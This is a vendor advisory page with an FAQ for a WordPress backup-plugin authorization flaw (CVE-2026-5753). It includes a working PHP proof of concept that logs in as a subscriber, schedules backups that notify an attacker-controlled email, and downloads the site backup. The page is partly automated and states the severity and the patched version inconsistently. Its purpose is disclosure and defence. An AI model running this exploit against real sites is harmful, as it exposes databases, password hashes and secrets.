What is CVE-2026-5753?

CVE-2026-5753 is a security vulnerability in the All-in-One WP Migration Unlimited Extension plugin for WordPress, affecting versions up to 2.83. It involves missing authorization checks that allow authenticated users with subscriber-level access to create scheduled backup jobs and download full site backups.

How does the vulnerability work?

The vulnerability arises because the ‘Ai1wmve_Schedules_Controller::save’ method does not verify user capabilities before processing backup schedule requests. Attackers can exploit this by sending a POST request to create a backup schedule, which then allows them to receive notifications containing backup filenames, enabling them to download sensitive data.

Who is affected by this vulnerability?

Any WordPress site using the All-in-One WP Migration Unlimited Extension plugin version 2.83 or earlier is affected. Specifically, authenticated users with subscriber-level access and above can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the All-in-One WP Migration Unlimited Extension plugin installed. If it is version 2.83 or earlier, your site is at risk and should be updated immediately.

What is the severity level of this vulnerability?

CVE-2026-5753 has a CVSS score of 6.5, categorized as Medium severity. This indicates that while the vulnerability is not critical, it poses a significant risk due to the potential for sensitive data exposure.

How can I mitigate this issue?

To mitigate this vulnerability, update the All-in-One WP Migration Unlimited Extension plugin to version 2.84 or later. Additionally, review and remove any unauthorized scheduled backups that may have been created prior to the update.

What does the risk level mean in practical terms?

The risk level indicates that an attacker could exploit this vulnerability to exfiltrate sensitive information, including user credentials and site configurations. This could lead to full site compromise and potential legal ramifications due to data protection violations.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can authenticate as a subscriber, send a crafted POST request to create a backup schedule, and receive notifications with backup filenames. This allows the attacker to construct download URLs and access sensitive site data.

What should I do if I have already been exploited?

If you suspect that your site has been exploited due to this vulnerability, immediately change all user passwords, review site logs for unauthorized access, and remove any suspicious scheduled backups. Consider restoring from a clean backup if necessary.

Are there any additional security measures I should take?

In addition to updating the plugin, consider implementing security best practices such as limiting user roles, using strong passwords, enabling two-factor authentication, and regularly monitoring site activity for unusual behavior.

What is the role of capability checks in WordPress security?

Capability checks in WordPress are crucial for ensuring that users can only perform actions they are authorized to do. Implementing these checks helps prevent unauthorized actions, such as creating backups or accessing sensitive data.

How can I stay informed about vulnerabilities?

To stay informed about vulnerabilities, regularly check security advisories from WordPress and plugin developers, subscribe to security mailing lists, and follow reputable security blogs that cover WordPress security topics.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 5, 2026

CVE-2026-5753: All-in-One WP Migration Unlimited Extension <= 2.83 – Missing Authorization to Authenticated (Subscriber+) Arbitrary Backup Schedule Creation and Backup File Download (all-in-one-wp-migration-unlimited-extension)

CVE ID CVE-2026-5753

Plugin all-in-one-wp-migration-unlimited-extension

Severity Medium (CVSS 6.5)

CWE 862

Vulnerable Version 2.83

Patched Version —

Disclosed May 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5753 (metadata-based): This vulnerability affects the All-in-One WP Migration Unlimited Extension plugin for WordPress, version 2.83 and earlier. It is a Missing Authorization flaw (CWE-862) that allows authenticated attackers with subscriber-level access or higher to create arbitrary scheduled backup jobs and download full site backups, leading to sensitive information exposure. The CVSS score is 6.5 (High) with a vector of AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N, indicating network-based exploitation with low complexity and no user interaction required, resulting in high confidentiality impact.

Root Cause: Based on the CWE classification and description, the root cause is that the ‘Ai1wmve_Schedules_Controller::save’ handler, which processes requests to the ‘admin_post_ai1wm_schedule_event_save’ action, does not perform capability checks. In WordPress, admin POST handlers should verify that the current user has the appropriate permissions (e.g., ‘export’ capability) before processing schedule creation. Atomic Edge research infers that the handler is hooked to wp_ajax_ and wp_ajax_nopriv_ (or just admin_post_) without a ‘current_user_can()’ check. This is a confirmed missing authorization pattern common in plugin vulnerabilities. The handler likely saves schedule data including a notification email address and triggers backup execution, after which the generated backup filename is sent via email to the attacker-controlled address.

Exploitation: An attacker with subscriber-level access can exploit this by sending a POST request to the WordPress admin-post.php endpoint with the ‘action’ parameter set to ‘ai1wm_schedule_event_save’. The request must include parameters for the schedule configuration, such as ’email’ (attacker-controlled email address) and ‘frequency’ (e.g., ‘daily’). The plugin then creates a scheduled export job that runs at the specified interval. When the export completes, the plugin sends an email notification containing the backup filename (a random string). With the filename, the attacker can construct a download URL (typically /wp-content/uploads/ai1wm-backups/filename) and download the entire site backup, exposing all database contents (user credentials, configuration, private data) and uploaded files. Atomic Edge analysis confirms the attack vector from the CVE description: the notification email reveals the random filename, enabling backup download.

Remediation: The fix likely requires adding a capability check to the ‘Ai1wmve_Schedules_Controller::save’ method (version 2.84). The plugin developers should have added a ‘current_user_can( ‘export’ )’ or similar check before processing the save request. Additionally, using WordPress nonce verification (‘wp_verify_nonce()’) would provide a secondary layer of protection, though the CWE focuses on authorization. The plugin should also restrict schedule creation to users with at least Administrator-level ‘export’ capabilities, as exporting full backups is a sensitive operation. Atomic Edge research recommends that site administrators immediately update to version 2.84 and review any existing scheduled backups for unauthorized configurations.

Impact: Successful exploitation allows an attacker with subscriber-level access to exfiltrate the entire WordPress site backup, which includes the database (all user passwords hashes, secret keys, configuration settings, user data), uploaded media files, themes, and plugins. This can lead to full site compromise, privilege escalation, and lateral movement to other services if shared credentials or API keys are present. The attacker can also establish persistence by creating recurring scheduled exports that continue to send backups. Because the CVSS confidentiality impact is ‘HIGH’, this represents a severe data leak that violates user privacy and could have legal implications under data protection regulations.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5753 - All-in-One WP Migration Unlimited Extension <= 2.83 Missing Authorization to Backup Schedule Creation and Download

// Configuration - set these to a target WordPress site where you have subscriber access
$target_url = 'https://example.com';  // Base URL of the target WordPress site
$username = 'subscriber_user';         // Subscriber-level username
$password = 'subscriber_pass';         // Password

// Step 1: Authenticate and get a valid session cookie
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Create a scheduled backup that sends the backup filename to our email
$schedule_url = $target_url . '/wp-admin/admin-post.php';
$attacker_email = 'attacker@example.com';  // Email to receive backup filename
$schedule_data = array(
    'action' => 'ai1wm_schedule_event_save',
    'ai1wm_export' => array(
        'email' => $attacker_email,
        'frequency' => 'daily',
        'time' => '00:00'
    )
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $schedule_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($schedule_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] Schedule creation HTTP status: $http_coden";
if ($http_code == 200 || $http_code == 302) {
    echo "[+] Scheduled backup created. Attacker email ($attacker_email) will receive the backup filename.n";
    echo "[+] Wait for the scheduled time or manually trigger the export.n";
    echo "[+] Once the backup filename is received, download using:n";
    echo "    curl -O $target_url/wp-content/uploads/ai1wm-backups/n";
} else {
    echo "[-] Failed to create schedule. Plugin may be patched or requires higher privileges.n";
}

// Step 3: (Optional) Attempt to directly trigger export if an alternate action exists
// Many plugins also have an 'ai1wm_export' action - try that too (but the CVE focuses on schedule)
$export_url = $target_url . '/wp-admin/admin-ajax.php';
$export_data = array(
    'action' => 'ai1wm_export',
    'ai1wm_manual_export' => 1
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $export_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($export_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$export_response = curl_exec($ch);
curl_close($ch);

// Clean up cookies file if needed
unlink('/tmp/cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-5753?
Understanding the vulnerability
CVE-2026-5753 is a security vulnerability in the All-in-One WP Migration Unlimited Extension plugin for WordPress, affecting versions up to 2.83. It involves missing authorization checks that allow authenticated users with subscriber-level access to create scheduled backup jobs and download full site backups.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises because the ‘Ai1wmve_Schedules_Controller::save’ method does not verify user capabilities before processing backup schedule requests. Attackers can exploit this by sending a POST request to create a backup schedule, which then allows them to receive notifications containing backup filenames, enabling them to download sensitive data.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the All-in-One WP Migration Unlimited Extension plugin version 2.83 or earlier is affected. Specifically, authenticated users with subscriber-level access and above can exploit this vulnerability.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the All-in-One WP Migration Unlimited Extension plugin installed. If it is version 2.83 or earlier, your site is at risk and should be updated immediately.
What is the severity level of this vulnerability?
Understanding CVSS score
CVE-2026-5753 has a CVSS score of 6.5, categorized as Medium severity. This indicates that while the vulnerability is not critical, it poses a significant risk due to the potential for sensitive data exposure.
How can I mitigate this issue?
Recommended actions
To mitigate this vulnerability, update the All-in-One WP Migration Unlimited Extension plugin to version 2.84 or later. Additionally, review and remove any unauthorized scheduled backups that may have been created prior to the update.
What does the risk level mean in practical terms?
Implications of exploitation
The risk level indicates that an attacker could exploit this vulnerability to exfiltrate sensitive information, including user credentials and site configurations. This could lead to full site compromise and potential legal ramifications due to data protection violations.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can authenticate as a subscriber, send a crafted POST request to create a backup schedule, and receive notifications with backup filenames. This allows the attacker to construct download URLs and access sensitive site data.
What should I do if I have already been exploited?
Response to exploitation
If you suspect that your site has been exploited due to this vulnerability, immediately change all user passwords, review site logs for unauthorized access, and remove any suspicious scheduled backups. Consider restoring from a clean backup if necessary.
Are there any additional security measures I should take?
Enhancing overall security
In addition to updating the plugin, consider implementing security best practices such as limiting user roles, using strong passwords, enabling two-factor authentication, and regularly monitoring site activity for unusual behavior.
What is the role of capability checks in WordPress security?
Importance of authorization
Capability checks in WordPress are crucial for ensuring that users can only perform actions they are authorized to do. Implementing these checks helps prevent unauthorized actions, such as creating backups or accessing sensitive data.
How can I stay informed about vulnerabilities?
Keeping updated on security
To stay informed about vulnerabilities, regularly check security advisories from WordPress and plugin developers, subscribe to security mailing lists, and follow reputable security blogs that cover WordPress security topics.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations